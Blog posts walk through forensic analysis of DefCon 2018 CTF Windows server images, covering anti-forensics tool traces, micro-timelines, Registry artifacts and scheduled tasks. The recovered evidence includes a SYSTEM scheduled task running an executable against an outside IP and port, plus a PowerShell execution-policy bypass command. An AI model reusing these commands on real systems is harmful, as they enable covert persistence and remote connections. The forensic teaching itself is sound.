Tuesday, May 21, 2019

DefCon 2018 CTF File Server Take-Aways

In my last post, I shared some findings with respect to analyzing an image for anti- or counter-forensics techniques, which was part of the DefCon 2018 CTF.  Working on the analysis for the question I pursued, writing it up, and reflecting on it afterwards really brought out a number of what I consider important take-aways that apply to DFIR analysis.

Version
The Windows version matters.  The first DefCon 2018 CTF image I looked at was Windows 2016, and the file server image was Windows 2008 R2.  Each had some artifacts that the other didn't.  For example, the file server image had a SysCache.hve file, and the HR server didn't.

Both of the images that I've looked at so far from the CTF were of Windows server systems, and by default, application prefetching is not enabled on server editions.

Something else to consider is, was the system 32- or 64-bit?  This is an important factor, as some artifacts associated with 32-bit applications will be found in a different location on a 64-bit system.

The version of Windows you're working with is very important, as it tells you what should and should not be available for analysis, and sort of sets the expectations.  Now, once you start digging in, things could change.  Someone could have enabled more detailed logging, or enabled application prefetching on a server edition of Windows; if that's the case, it's gravy.

This is also true for applications, as well as other operating systems.  Versions and family matter. 

Execution
A file existing on the system does not definitively mean it was executed; the same is true with a GUI application.  Just because a GUI application was launched by a user, does that mean that it was actually run, that the functionality available through the GUI was run?  That's the challenge with GUI applications, isn't it?  How do you tell when they're actually run beyond just the GUI being opened?  Did the user select various options in the UI and then click "Ok", or did they simply open the GUI and then close it?

Yeah, I get it...why open the application and launch the UI if you don't actually intend to run it?  We often think or say the same thing when it comes to data staging and exfiltration, don't we?  Why would an actor bother to stage an archive if they weren't going to exfil it somehow?  So, when we see data staged, we would assume (of course) that it was exfiltrated.  However, we may end up making that statement about exfiltration in the absence of any actual data to support it. What if the actor tried to exfil the archive, but failed? 

If you don't have the data available to clearly and definitively illustrate that something happened, say that.  It's better to do that, than it is to state that something occurred, only to find out later that it didn't.

Consider this...an application running on the system can be looked at as a variation of Locard's Exchange Principle; in this case, the two "objects" are the application and the eco-system in which it is executing.  In the case of an application that reportedly performs anti- or counter-forensics functions, one would expect "forensic artifacts" to be removed somehow; this would constitute the "material" exchanged between the two objects.  "Contact" would be the execution of the application, and in the case of a GUI application, specifically clicking on "Ok" once the appropriate settings have been selected.  In the case of the file server CTF question, the assumption in the analysis is that "forensic artifacts" were deleted.

Why does it matter that we determine if the executable was actually launched, or if the functionality within the GUI tool was actually launched by the user?  Isn't it enough to simply say that the file exists on the system and that it had been run, and leave it at that?  We have to remember that as an expert, our findings are going to be used by someone to make a decision, or are going to impact someone.  If you're an IR consultant, it's likely that your findings will be used to make critical business decisions; i.e., what resources to employ, or possibly even external notification mandated by compliance regulations or even legislation.  I'm not even going to mention the legal/law enforcement perspective on this, as there are plenty of other folks out there who can speak authoritatively on that topic.  However, the point remains the same; what you state in your findings are going to impact someone.

Something else to consider is that throughout my time in the industry, I've seen more than a few times when a customer has contacted my team, not to perform DFIR work, but rather to review the DFIR work done by others.  In one instance, a teammate was asked by the client, "what questions would you ask?"  He was given the report produced by the other team, and went through it with a fine-tooth comb. I'm also aware of other instances where a customer has provided the same data to two different consultants, and compared the reports.  I can't say that this has happened often, but it has happened.  I've also been in situations where the customer has hired two different consulting companies, and shared the reports they (the customer) received with the other company.

Micro-Timelines and Overlays
One thing that was clear to me in both of the posts regarding the DefCon CTF images was the value and utility of micro-timelines.  Full timelines of system activity are very valuable, as well, because they serve to provide a significant amount of context around system activity at some point in time.  However, full system timelines are also very noisy, because Windows systems are very noisy.  As we saw in the last blog post, there was a Windows update being installed around the same time that "forensic artifacts" were being deleted.  This sort of circumstance can create confusion, and lead to the misinterpretation of data. 

However, by using micro-timelines, we can focus on specific sets of artifacts and start building out a skeleton analysis.  We can then use that skeleton as an overlay, and pivot into other micro-timelines, as well as into the full timeline.  Timeline analysis is an iterative process, adding and removing layers as the picture comes more into focus. 

This process can be especially valuable when dealing with activity that does not occur in an immediately sequential manner.  In my last blog post, the user launched an application, and then enabled and launched some modicum of the application's functionality.  This occurred in a straightforward fashion, albeit with other system activity (i.e., Windows update) occurring around the same time.  But what if that hadn't been the case?  What if the activity had been dispersed over days or weeks?  What if the user had used RegEdit to delete some of the forensic artifacts, and had done a few at a time?  What if the user had also performed online searches for tips on how to remove indications of activity, and then those artifacts were impacted, but over a period of days?  Having mini- and micro-timelines to develop overlays and use as pivot points would make the analysis so much easier and efficient that scrolling through a full system timeline.

Deep Knowledge
Something that working and reflecting on my previous post brought to mind is that deep knowledge has considerable value.  By that, I mean deep knowledge not only of data structures, but also of the context of the available data.

Back when I was performing PCI investigations (long ago, in a galaxy far, far away...), one of the analysts on our team followed our standard process for running searches for credit card numbers (CCNs) across the images in their case.  We had a standardized process for many of the functions associated with PCI investigations due not only to what was mandated for the investigations, but the time frame in which the information had to be provided, as well.  By having standardized, repeatable processes, no one had to figure out what steps to take, or what to do next.  In one instance, the search resulted in CCNs being found "in" the Software hive.  Closer examination revealed that the CCNs were not value names, nor were they stored in a value data; rather, they were located in unallocated space within the hive file, part of sectors added to the logical file as it "grew".  Apparently, the bad guy had run tools to collect CCNs into a text file, and then at one point in their process, deleted that text file.  Those sectors that contained the data were added to the Software hive as it grew in size.

Having the ability to investigate, discover, and understand this was critical, as it had to be reported to Visa (Visa ran the PCI Council at the time) and there were strong indications that someone at Visa actually read the reports that were sent in...often, in great detail.  In fact, I have no doubt in my mind that there were other DFIR analysts who reviewed the reports, as well.  As such, being able to tie our findings to data in a reproducible manner was absolutely critical.  Actually, it should always be paramount, and foremost on your mind.

MITRE ATT&CK
One of the aspects of the MITRE ATT&CK framework that I've been considering for some time now is something of a reverse mapping for DFIR. What I mean by this is that right now, using the DefCon 2018 CTF file server image, we can map the activity from the question of interest (counter-forensics) to the Defense Evasion tactic, and then to the Indicator Removal From Host technique.  From there, we might take things a step further and add the findings from my last blog post as "observables"; that is, the user's use of the PrivaZer application led to specific "forensic artifacts" being deleted, which included artifacts such as the UserAssist value name found to have been deleted, the "empty" keys we saw, etc.

From there, we can then say that in order to identify those observables for the technique, we would want to look for the artifacts, or look in the locations, identified in the blog post.  This would be a reverse mapping, going from the artifacts back to the tactic. 

Let's say that you were examining an instance of data exfiltration, one that you found had occurred through the use of a bitsadmin 'upload' job.  Within the Data Exfiltration tactic, the use of bitsadmin.exe (or PowerShell) to create an 'upload' job might be tagged with the Automated Exfiltration or the Scheduled Transfer technique (or both), depending upon how the job is created.  The observable would be the command line (if EDR monitoring was in place) used to set up the job, or in the case of DFIR analysis, a series of records in the BitsAdmin Client Event Log. 

Reversing this mapping, we know that one way to identify either of the two techniques would be to look in the BitsAdmin Client Event Log.  You might also include web server logs as a DFIR artifact that might help you definitively identify another aspect of data exfiltration.

In this way, we can extend our usual mapping from tactic to technique, adding "observables" and data sources, which then allows us to do a reverse mapping back to the tactic.  Sharing this across the DFIR team means that now analysts don't have to have had the experience of investigating a case of data exfiltration in order to know what to look for.

Saturday, May 18, 2019

DefCon 2018 File Server

After engaging with the first image from the DefCon 2018 CTF, I thought it would be fun, and instructive, to take a look at the second image in the CTF, the File Server.

As before, not having signed up for the CTF itself, I found the questions associated with the image at the following sites:
HackStreetBoys
InfoSecurityGeek
Caffeinated4n6

One of the CTF questions that caught my attention was, What tool was used to delete forensic artifacts?  I've long been interested in two aspects of DFIR work that are directly associated with that question; anti- (or counter-) forensics, and what something looks like in the data (i.e., how is the behavior represented in the data?).

I found the answers to the question were interesting.  The HackStreetBoys response referenced the output of the itempos.pl plugin, which listed the contents of the mpowers user desktop.  A reference to a program was found, one that was determined to be used for counter-forensic purposes, and that program was the response to the CTF question.  The other two responses referenced the UserAssist data, and similarly, it seems that something was found that could be an anti-forensic tool, was found on Google and seen to be an anti-forensics tool, and that was the answer.

However, beyond that, there was little in the way of verification that the program had actually been used to perform the specified task.  This is not to say that any analysis was incorrect; in the publicly available write-ups I reviewed, the answers to this question were reasonable guesses based on some modicum of the available data.

We know that the system was running Windows 2008 R2, and that tells us a good bit in and of itself.  For example, being a server version of Windows, application prefetching is not enabled by default, something we can easily verify both via the Registry, as well as via visual inspection of the image.  Something else that the version information tells us is that we won't have access to other artifacts associated with program execution, such as the contents of the BAM subkeys.  Further, there are other artifact differences with respect to the first image in the CTF; for example, the File Server image contains a SysCache.hve file, but not an AmCache.hve file.

As such, the InfoSecurityGeek and Caffeinated4n6 blogs focused on the UserAssist data, and rightly so.  If you look closely at the Registry Explorer screen capture in the InfoSecurityGeek blog, you'll see that the identified value in the UserAssist data does not have a time stamp associated with it.  I've seen this happen, where the value data in the Registry either does not contain the time stamp associated with when the user launched the program, or the data itself is all zeros.

As a bit of a side note...and this is more of a personal/professional preference..I tend to prefer to not hang a finding on a single data point.  What I try to do is find multiple data points, understanding the context of each, that help build out the story of what happened.  For example, the fact that a program file existed on a system does not directly correlate to the fact that it was executed or launched.  Similarly, the fact that a GUI program was launched does not definitively state that it had be run.  I can open RegEdit and browser the Registry (or not) and then close it, but that does not definitively demonstrate that I changed anything in the Registry through the use of RegEdit.

From reviewing all three blog posts, we know that a file exists on the mpowers user desktop that, based on Google searches, is capable of taking anti- or counter-forensics actions (i.e., deleting forensic artifacts).  We also know that it is a GUI program, and that indications are that the user launched the GUI.  But what we don't know is, was the program actually run, in order to "delete forensic artifacts"?

Or do we?

Based on the question, the assumption is that forensics artifacts had been deleted, and as such, would not be found via our 'normal' processes.  This is illustrated by the fact that a good bit (albeit not all) of the data we'd normally look to with regard to user activity appears to have been removed; the RecentDocs key for the user isn't populated, there are no visible LNK files in the user's Recent folder, and there are only two JumpLists in the user's AutomaticDestinations folder.  Not definitive, but it's something.

So, my approach was to look to deleted keys and values within the user's NTUSER.DAT hive. One of the values found was:

P:\Hfref\zcbjref\Qrfxgbc\CevinMre.rkr

Knowing that the value names are Rot-13 encoded, that entry decodes to:

C:\Users\mpowers\Desktop\PrivaZer.exe

Tracking the value data based on the offset listed in the value node structure, and then parsing the data at that location, here is what I found:

00 00 00 00 01 00 00 00 02 00 00 00 E4 6B 01 00   .............k..
00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF   ................
00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF   ................
00 00 80 BF 00 00 80 BF FF FF FF FF 30 DA 50 46   ............0.PF
8C 2E D4 01 00 00 00 00                           ........

As you can see, there are 8 bytes toward the end of the data that are a FILETIME object. With a little scripting-action, I was able to extract the data and translate the time stamp into something human-readable:

Tue Aug  7 20:21:51 2018

The process of getting the above time stamp involved getting the offset to the data from the value structure, locating the data in the binary contents of the NTUSER.DAT file (via a hex editor) and then writing (well, not writing so much as copy-paste, right from the RegRipper userassist.pl plugin...) a small bit of code to go in and extract and process the data. Remember, the "active" value within the hive file contained data for which the time stamp was all zeros; in this case, we now  have a time stamp value that we can work with.  Within a micro-timeline of user activity, we see the following:

Tue Aug  7 20:24:14 2018 Z
  REG    mpowers - M... HKCU/mpowers/Software/Microsoft/Windows/CurrentVersion/Explorer/StreamMRU 
  REG    mpowers - M... HKCU/mpowers/Software/Microsoft/Windows/CurrentVersion/Explorer/ComDlg32/CIDSizeMRU 

Tue Aug  7 20:24:13 2018 Z
  REG    mpowers - M... HKCU/mpowers/Software/Microsoft/Windows/CurrentVersion/Explorer/ComDlg32/OpenSavePidlMRU 
  REG    mpowers - M... HKCU/mpowers/Software/Microsoft/Windows/CurrentVersion/Explorer/ComDlg32/LastVisitedPidlMRU 
  REG    mpowers - M... HKCU/mpowers/Software/Microsoft/Windows/CurrentVersion/Explorer/RecentDocs 

So, we see a number of Registry keys modified, and from our use of the appropriate RegRipper plugins (as well as a viewer, to verify) we can see that all of these keys are empty; that is, none is populated with any values.  This may be the "delete forensic artifacts" that we were looking for...

Pivoting into a more comprehensive timeline of system activity based on the time stamp, we see the following activity:

Tue Aug  7 20:23:53 2018 Z
  FILE      - MA.B [43680] C:\Users\mpowers\AppData\Local\Temp\000\717000000000000000000_p.0x0

Tue Aug  7 20:22:18 2018 Z
  FILE      - M... [221] C:\Users\mpowers\AppData\Local\Temp\000\new_version.txt

Tue Aug  7 20:22:17 2018 Z
  FILE      - .A.B [221] C:\Users\mpowers\AppData\Local\Temp\000\new_version.txt

Tue Aug  7 20:22:15 2018 Z
  FILE       - MA.. [4096] C:\Users\mpowers\Downloads\$I30
  FILE       - MA.. [56] C:\Users\mpowers\Downloads\


Tue Aug  7 20:21:56 2018 Z
  FILE       - .A.B [314] C:\Users\mpowers\AppData\Local\Temp\000\data.ini

Tue Aug  7 20:21:55 2018 Z
  FILE       - MA.B [3096] C:\$Extend\$RmMetadata\$Txf\00000000000060CC\
  FILE       - MA.B [870278] C:\Users\mpowers\AppData\Local\Temp\000\sqlite3.dll
  FILE       - MA.B [56] C:\$Extend\$RmMetadata\$Txf\00000000000060CC\$TXF_DATA
  FILE      - ...B [4096] C:\Users\mpowers\AppData\Local\Temp\000\$I30
  FILE      - ...B [48] C:\Users\mpowers\AppData\Local\Temp\000\

Following the activity illustrated above, we see a significant series of events within the timeline that may be indicative of artifacts being "cleaned up"; specifically, folders and Registry keys are being modified presumably emptied), and files deleted.

Something else that is very instructive from the system timeline is that while the apparent deletion activity is going on, there is also an update being applied.  This is a great example demonstrating how verbose Windows systems can be, particularly when it comes to creating events on the systems.  When reviewing the timeline, I noticed that there were more than a few files being created, rather than modified, that appeared to associated with a Windows update.  There were also some Registry keys that were being "modified".  I then checked the following log file:

C:\Windows\Logs\CBS\DeepClean.log

The entries in this log file indicated not only that there were updates being applied, but also which updates were applied, and which were skipped.  This is great illustration of why micro-timelines, pivot points, and overlays are so valuable in timeline analysis; throwing everything into a single file or view would lead to a massive amount of data, and an analyst might miss important artifacts, or "signal", buried amongst the "noise".

Finally, there was a whole swath of events similar to the following:

 - MA.B [0] \[orphan]\00000000000000000000000000000000552.0x0

After all of that activity, we see the following:

Tue Aug  7 20:31:36 2018 Z
  FILE      - M... [314] C:\Users\mpowers\AppData\Local\Temp\000\data.ini

Tue Aug  7 20:30:59 2018 Z
  FILE      - M... [0] C:\Users\mpowers\Desktop\PrivaZer registry backups\WIN-M5327EF98B9\00000000000000.0x0
  FILE      - MA.. [48] C:\Users\mpowers\Desktop\PrivaZer registry backups\WIN-M5327EF98B9\
  REG       - M... HKLM/Software/Microsoft/Windows/CurrentVersion/RunOnce 
  FILE      - M... [0] C:\Users\mpowers\Desktop\PrivaZer registry backups\WIN-M5327EF98B9\000000000000000000.0x0

We see that the data.ini file associated with the PrivaZer tool was last modified in the timeline extract above.  The final 2 lines in the file are:

[last_erase_date2]
717=131781474597770000

That long string of numbers could be a FILETIME object; assuming it is and converting it to something human readable, we get:

2018-08-07T20:31:00+00:00

Okay, the granularity of the time stamp is only to the minute, and it is stored in a 100-nanosecond-epoch format, but what it seems to give us is the last date that the program was run.  What's interesting is that within the timeline of system activity, there doesn't seem to be any more activity following that time stamp that is associated with mass deletion or counter-forensics activity, likely as a result of the PrivaZer program.  There is a significant amount of failed login activity that picks up shortly thereafter within the overall timeline; this activity could be seen as counter-forensics in nature.

Why is this important?  Well, about 3 minutes prior to the above activity kicking off, there were two attempts to install CCleaner on the system. I say "attempts", because the timeline contains several application error or crash events related to the following file:

C:\Users\mpowers\Downloads\ccsetup544pro.exe

Following these crashes, there does not appear to be any timeline data indicative of the program being installed (i.e., files and Registry keys being created or updated, etc.), nor does there seem to be any indication of the use of CCleaner.

By correlating the time that the PrivaZer program was launched to additional events that occurred on the system, we now have much more solid information that the program was used to "delete forensic artifacts".  This is important because some of the deleted artifacts could have been removed with native tools such as RegEdit or reg.exe; having an apparent privacy tool on the user desktop does not necessarily mean that it was used to perform the actions in question.  Yes, it is a logical guess, based on the data.  However, by looking a bit closer at the data, we can see further activity associated with program execution.

Conclusion
Again, my reason for sharing this isn't to point out anything with anyone else's analysis...not at all.  But something I've seen repeatedly during my time in the industry has been statements made regarding findings that are not tied to data.  One example of this is the question of data exfiltration; often exfiltration is assumed when data has been staged and archived.  After all, why would an actor go through the work of collecting, staging, and archiving data if they weren't going to exfiltrate it?  But why assume data exfiltration in that case when the data available to illustrate data exfiltration (i.e., packet captures, netflow data, logs, etc.) isn't available; why not simply state that the data was not available?

That's what I attempted to illustrate here.  Yes, there is a file on the user's desktop called "PrivaZer.exe", and yes, per Google searches, this program can be used to "delete forensic artifacts".  But how do we know that it was, in fact, used to "delete forensic artifacts", if we don't look at the data to see if there were indications that the program was actually run?  Think about it...RegEdit could have been used to "delete forensic artifacts", specifically those within the Registry. The user could have used RegEdit to delete the contents of the keys themselves.

However, this activity would have left artifacts itself.  RegEdit is an "applet", in MS terms, and one of the artifacts retrieved by the RegRipper applets.pl plugin is the last Registry key that had focus when RegEdit was closed.  Not only was this appropriate key (i.e., the RegEdit subkey beneath the Applets key) not present within the 'active' Registry, I did not find an indication of the key having been deleted.

Tuesday, May 14, 2019

DefCon 2018 CTF Plus

I don't often engage in CTFs. Yes, they're fun, but even when an effort is made to have various aspects or stages be representative of real-world use cases, overall, they don't tend to hit the mark.  I've done some of the various challenges, and once or twice been part of the test team for CTF challenges.

Not too long ago, I ran across David Cowen's blog post for the DefCon 2018 CTF.  I wanted to run through at least the first image, but I didn't want to sign up for the challenge...I was just hoping to find the scenario or questions.  Phill pointed me to Google, and I found a couple of sites that included the individual questions, along with responses (HackStreetBoys, InfoSecurityGeek, Caffeinated4n6).

If you look at the questions answered at each of the linked sites, you'll see that there are some commonalities in answering the individual questions in the CTF, and in other cases, there are a few differences.  One example of differences is for the question, What was the name of the batch file saved by mpowers? The HackStreetBoys opted to use the MFT, while Caffeinated4n6 went with Registry Explorer.  I chose to use the RegRipper comdlg32.pl plugin, and we all arrived at the same answer.  This is not to say that one method was better than another, as we all got to the same correct response.

However, IRL, this isn't likely where things will stop.  In my experience, there haven't been many (re: none) customers who have asked me to simply determine the batch file that a user saved, and leave it at that; with real-world DFIR, there was always something more to it.  As such, I decided to use the question (the one about the batch file being written) as a starting point, and build out an analysis approach that was a bit closer to the sort of thing that you would see as a DFIR consultant, or even as an analyst in an FTE position within a company.

We can see in a timeline of overall system activity when the batch file was created:

Mon Jul 23 16:15:06 2018 Z
  FILE    - .A.B [169] C:\Production\update_app.bat

We can also see when the file was last modified:

Mon Jul 23 17:35:35 2018 Z
  FILE    - MA.. [48] C:\Users\mpowers\AppData\Roaming\Notepad++\backup\
  FILE    - M... [169] C:\Production\update_app.bat

Taking a look at the MFT record for the file, we can confirm this:

166116     FILE Seq: 4    Links: 2   
[FILE],[BASE RECORD]
.\Production\update_app.bat
    M: Mon Jul 23 17:35:35 2018 Z
    A: Mon Jul 23 16:15:06 2018 Z
    C: Mon Jul 23 17:35:35 2018 Z
    B: Mon Jul 23 16:15:06 2018 Z
  FN: UPDATE~1.BAT  Parent Ref: 165091/2
  Namespace: 2
    M: Mon Jul 23 16:15:57 2018 Z
    A: Mon Jul 23 16:15:06 2018 Z
    C: Mon Jul 23 16:15:57 2018 Z
    B: Mon Jul 23 16:15:06 2018 Z
  FN: update_app.bat  Parent Ref: 165091/2
  Namespace: 1
    M: Mon Jul 23 16:15:57 2018 Z
    A: Mon Jul 23 16:15:06 2018 Z
    C: Mon Jul 23 16:15:57 2018 Z
    B: Mon Jul 23 16:15:06 2018 Z
[$DATA Attribute]
[RESIDENT]
File Size = 169 bytes

A couple of other bits of information from the MFT record...it doesn't appear as if the file was time stomped, and the file is resident within the record.  This isn't surprising, given the size, but it would have an effect on our ability to recover indications of the file, should it be deleted.

Creating a micro-timeline using the mpowers UserAssist, RecentApps, and RecentDocs Registry entries, and IE browser history, we can get a good bit of additional detail regarding just that user's activity.  Pivoting into that micro-timeline with the name of the batch file, we can see from the comdlg32.pl plugin the date/time when the batch file was accessed by the user:

Mon Jul 23 16:48:15 2018 Z  
  REG     mpowers - ComDlg32: OpenSavePidlMRU\bat - My Computer\C:\Production\update_app.bat

Continuing to search the micro-timeline for indications of the batch file, we see:

Mon Jul 23 17:35:53 2018 Z
  REG     mpowers - [Program Execution] UserAssist - C:\Production\update_app.bat (3)
  REG     mpowers - C:\Production\update_app.bat (3)

In short, not only do we see the file being created and saved, but we can see that the file was executed.  This is huge!  A batch file, or even malware, sitting on a system is harmless.  It doesn't do anything until its launched or executed. Viewing the contents of the batch file within FTK Imager, we can see that it includes two copy commands, each of which copies a file from a Z:\ volume to the C:\Production folder.  Incorporating the user-specific timeline information into an overall timeline of system activity as an 'overlay', or using it as a pivot point into the system timeline, we can see the effects that the batch file being executed has upon its overall eco-system (the server file system, Registry, Windows Event Log, etc.)

Using the contents of the batch file as a pivot point, we can see from the micro-timeline of user activity that the mpowers user accessed the Z:\ volume pretty extensively. But where does that volume come from?  Is it a USB device?  Checking the Software and System hives for indications of connected USB devices reveals that there isn't a great deal of information available to indicate the use of a USB device.  How about a mapped share?  Our micro-timeline reveals the following:

Mon Jul 23 16:01:14 2018 Z
  REG    mpowers - ShellBags - Desktop\My Computer\Z:\project_0x02\tcontinuous\dist

Mon Jul 23 16:00:53 2018 Z
  REG    mpowers - Map Network Drive MRU - \\74.118.139.11\M4Projects

While not directly conclusive, the timing of the above events is close enough that we may be able to reasonably tie the mapped folder to the Z:\ volume.

Further, we still have a good bit of information about the batch file itself.  Looking at the micro-timeline, and pivoting on the batch file name without the extension, we see references to update_app.ps and update_app.ps1, both apparently located (per the mpowers micro-timeline) in the C:\Production folder. However, viewing the image via FTK Imager, neither of those files appear in that folder.  Searching the overall timeline of system activity similarly provides no indication of the files.  These look like they may be PowerShell scripts, but again, we don't see them in the 'active' file system within the image.

Checking the contents of the mpowers ConsoleHost_history.txt file, we see the following:

cd C:\Production\
dir Z:\project_0x02\tcontinuous\dist\
dir Z:\project_0x02\tcontinuous\production\
copy Z:\project_0x02\tcontinuous\production\tcontinuous.exe C:\Production\
$PSVersionTable.PSVersion.toString()

Much like a .bash_history file on Linux systems, the ConsoleHost_history.txt file does not contain time stamps. However, it does provide some useful information, in this case indicating that there was some use of PowerShell by the user.  Knowing that, and knowing that PowerShell scripts were likely associated with the user, we can create a micro-timeline of PowerShell events, which requires only two commands (note that I've already extracted Windows Event Log files from the image):

wevtx.bat f:\defcon\files\*powershell*.evtx f:\defcon\files\ps_events.txt

...and...

parse -f f:\defcon\files\ps_events.txt > f:\defcon\files\ps_tln.txt

As a result of the commands, we have a good bit of information available to us from the Windows Event Logs, and it is much easier to go through than if we had a full timeline of all system activity.  For example, we can easily see clusters of PowerShell/600 events beginning at Mon Jul 23 16:27:51 2018 Z, which include the following:

HostApplication=Powershell.exe -ExecutionPolicy Bypass C:\Production\update_app.ps1

Ah, okay...so it appears that PowerShell was used to attempt to launch this file; our assumption that the .ps and .ps1 files were PowerShell scripts is in the process of being confirmed.  However, at the same time, we also see a PowerShell/300 (warning) event that states:

Could not find the drive 'Z:\'. The drive might not be ready or might not be mapped.

Hhhhmmm...for whatever reason, the script seems to have had issues, and possibly not worked.  This may be the reason why the user resorted to a batch file.

But wait...there's more...

Mon Jul 23 17:55:30 2018 Z
  REG    - M... HKLM/Software/ROOT/Microsoft/Windows NT/CurrentVersion/Schedule/TaskCache/Tree/Update App  
  FILE   - .A.B [3874] C:\Windows\System32\Tasks\Update App

From the above we can see that a Scheduled Task was created, and viewing the contents of the XML file, we can see that the task contains the command "C:\Production\update_app.bat".  Shortly thereafter, we see:

Mon Jul 23 17:57:17 2018 Z
  FILE   - .A.B [742400] C:\Production\tthrow.exe
  FILE   - .A.B [5425251] C:\Production\tcontinuous.exe

Okay, there are the files that were the targets of the 'copy' commands.  Shortly after these events in the timeline, we see:

Mon Jul 23 18:07:14 2018 Z
  FILE   - M... [474] C:\Users\mpowers\AppData\Roaming\Microsoft\Credentials\F03B2BF5CC26D5309225478FE717BB7E
  FILE   - M... [1806] C:\Windows\debug\PASSWD.LOG
  REG    - M... HKLM/Software/ROOT/Microsoft/Windows NT/CurrentVersion/Schedule/CredWom/S-1-5-21-2967420476-1305424719-3994513216-1000 
  FILE   - M... [3872] C:\Windows\System32\Tasks\Throw Taco

From the above, we can see that the "Throw Taco" Scheduled Task XML file was modified.  The XML contents of the "Throw Taco" Scheduled Task includes:

C:\Production\tcontinuous.exe
tthrow.exe 74.118.139.11:7420

This gives us some information with respect to our two mystery files, the relationship between them, and how they were used (i.e., one was an argument for the other, and they were run with SYSTEM-level privileges).  But what about the other entries in the timeline, at the same time?  The Registry key that points to "CredWom" includes the SID for the mpowers user, and the last entry in the passwd.log file reads:

07/23 11:07:14 Attempting password change server/domain 
WIN-29U41M70JCO for user mpowers

So, at this point, we haven't done actual malware RE on the two mystery files, but we do have a good deal of valuable information for an analyst.

Pivoting back to the Scheduled Tasks, we can develop a good view of task execution activity (or history) by using wevtx.bat to parse the Task Scheduler Event Log file into an events file, and then create individual events files for each task using 'find'.  From there, using parse.exe to convert the individual events files into micro-timelines gives us the available execution history for the tasks.

Summary
What started out as a straightforward CTF question developed into a much fuller investigation, using timelines (full, micro), overlays, and pivot points, all in order to build out a pretty interesting picture of activity on the system, around not just the user saving the batch file, but the use of the batch file and the relationship to other activity on the system.

Something else of value you can use from the AmCache.hve file is the following:

Mon Jul 23 17:39:12 2018 Z
  AmCache  - Key LastWrite - c:\production\tthrow.exe (5267b1da851ce675b1f07e0db03fe12eb51ec43e)

Mon Jul 23 17:25:36 2018 Z
  AmCache  - Key LastWrite - c:\production\tcontinuous.exe (ad2134b5ad9ed046963c458e2152567b6269235f)

Now we have hashes, and in this case, links to VT detections (which won't always be the case).

We've also seen is the value of knowing the version of Windows you're working with; in this case, Windows Server 2016 DataCenter.  This informs us as to things such as the version of PowerShell installed (version 5.1.14393.1884), and that the PowerShell Event Log records would be much more inclusive than they were on Windows 7.

The CTF image provides other interesting opportunities, as well, such as working with Volume Shadow Copies, recovering deleted data (from unallocated space, Registry hives, etc.), working with Registry transaction logs, using hindsight to parse a user's Chrome history, etc.

Take-Away
A big take-away from this analysis walk-thru, for me, is that micro-timelines, overlays, and pivot points are extremely useful during analysis.  Windows systems are very noisy and verbose, and taking a minimal view of different data sources so that you can begin orienting yourself helps cut through a lot of that noise.  A timeline creation process that isn't completely automated provides room for processes that allow the analyst to target specific data sources and develop mini-timelines, and in turn, pivot points.

As an example, the BITS Client Event Log file from the system image has a number of event records, but none of them necessarily have anything to do with the investigation itself, but rather with Windows and Chrome updates.  This also means that data sources such as file system metadata, Windows Event Logs, USN change journal, and possibly even the Registry are going to contain a lot of events related to those updates.  As such, creating an overall system timeline, but then using micro-timelines to develop pivot points into the overall timeline will allow for iterative, targeted analysis.  Developing micro-timelines and then using what's gleaned from them to pivot into the overall system timeline for context is a great way to build out an investigation, and provide the basis for your analysis.

Final Words
I wanted to give a huge thanks and shout-out to David and Matt for putting this CTF together!  It's a lot of work to put together a CTF with just minimal artifacts, and they did so with three full images!  Thanks so much for making these available!

Wednesday, May 08, 2019

Deep Knowledge, and the Pursuit Thereof

When IR was largely DF-related work, relatively few in the industry held deep knowledge of artifacts.  Over the years, IR has moved from "image all the things" to "find and image the impacted systems" to "let's deploy an enterprise agent or sensor and collect data from all the things".  As the need for enterprise-wide response became more evident, we developed concepts such as "triage", or collecting specific, targeted data from systems to make a decision as to whether they were "in scope" or not.  We adapted concepts such as "sniper forensics", seeking out that targeted data, from disk forensics to the enterprise.  As we've moved to this enterprise-scale response, including deploying sensors, agents, and automated means of data collection and parsing, we need to ensure that we continue to progress beyond where we were before, in that practitioners can be even further removed from developing a deep knowledge of the data.  This isn't to say that this is the case for all analysts; being absolute would be both incorrect and pointless. 

As tools and frameworks have been specifically designed for addressing the enterprise issue, deep knowledge of systems and artifacts can potentially remain with a few, rather than opening the door and extending that knowledge for the many. As practitioners, we have to be wary of tools and frameworks blinding us to the deep knowledge of the nature and context of the data itself.

Many, many moons ago, back when I was QSA-certified and conducting PCI examinations (ssshhh...don't tell anyone...), our team was using a commercial forensic suite to perform searches across acquired images for credit card numbers (CCNs).  Our assumption was that the commercial product performed as advertised, in that it found "valid" CCNs, per the definition of the PCI Council (which, at the time, was Visa).  We had three checks at the time...BIN, length, and Luhn...and if the CCN that was found passed all three, it was passed along to the appropriate card brand for verification.  At one point, we had a case for which we knew CCNs from two specific brands had been used, but running the commercial product produced no results for those brands.  Our initial query with respect to what the product considered a "valid" CCN resulted in a link to a wiki page on credit card numbers, but did nothing to explain why we weren't received the expected result.  Finally, a deeper investigation, which included further questions and no small amount of testing, revealed that the product at the time did not consider some valid CCNs to be "valid".  Rather than waiting for the core, underlying code to be updated, we opted to go with 7 distinct regexs; while this slowed the search process down, it did give us the needed capability.

My point is that all of this came from a few analysts who were close to the data, and had 'deep knowledge' of the artifacts.  Or, at least deep enough to know where they needed to go deeper than what the tool was presenting.  At the time, this was not something that was plastered all over the Internet; no, it was these few analysts who were looking at the issue, and subsequently, wondering what else had been missed.

When I first released RegRipper over a decade ago, my intention was for it to be a community-based tool.  There was one thing that I was absolutely sure of...I would never see everything there was to see, even in the Registry, nor would I know everything there was to know.  As such, I wanted to provide a means by which analysts could either write their own plugins (some did, starting with copy-paste...) and share them with the community, or reach out and share data so that a plugin could be written or updated.  Over the years, more than a few have done so, but for the most part, those who use the tool do so by downloading and running it.

In 2013, Corey Harrell released auto_rip, a tool that brought a modicum of automation to RegRipper. In releasing it, Corey stepped on to the path of sharing his thought process when it came to analysis; in auto_rip, Corey shared how he structures the collected data for analysis, moving RegRipper from a point-and-fire tool to one used to take a targeted approach to data parsing and presentation. Much more recently, Silv3rHorn released autoripy, in part because auto_rip hadn't been updated in some time.

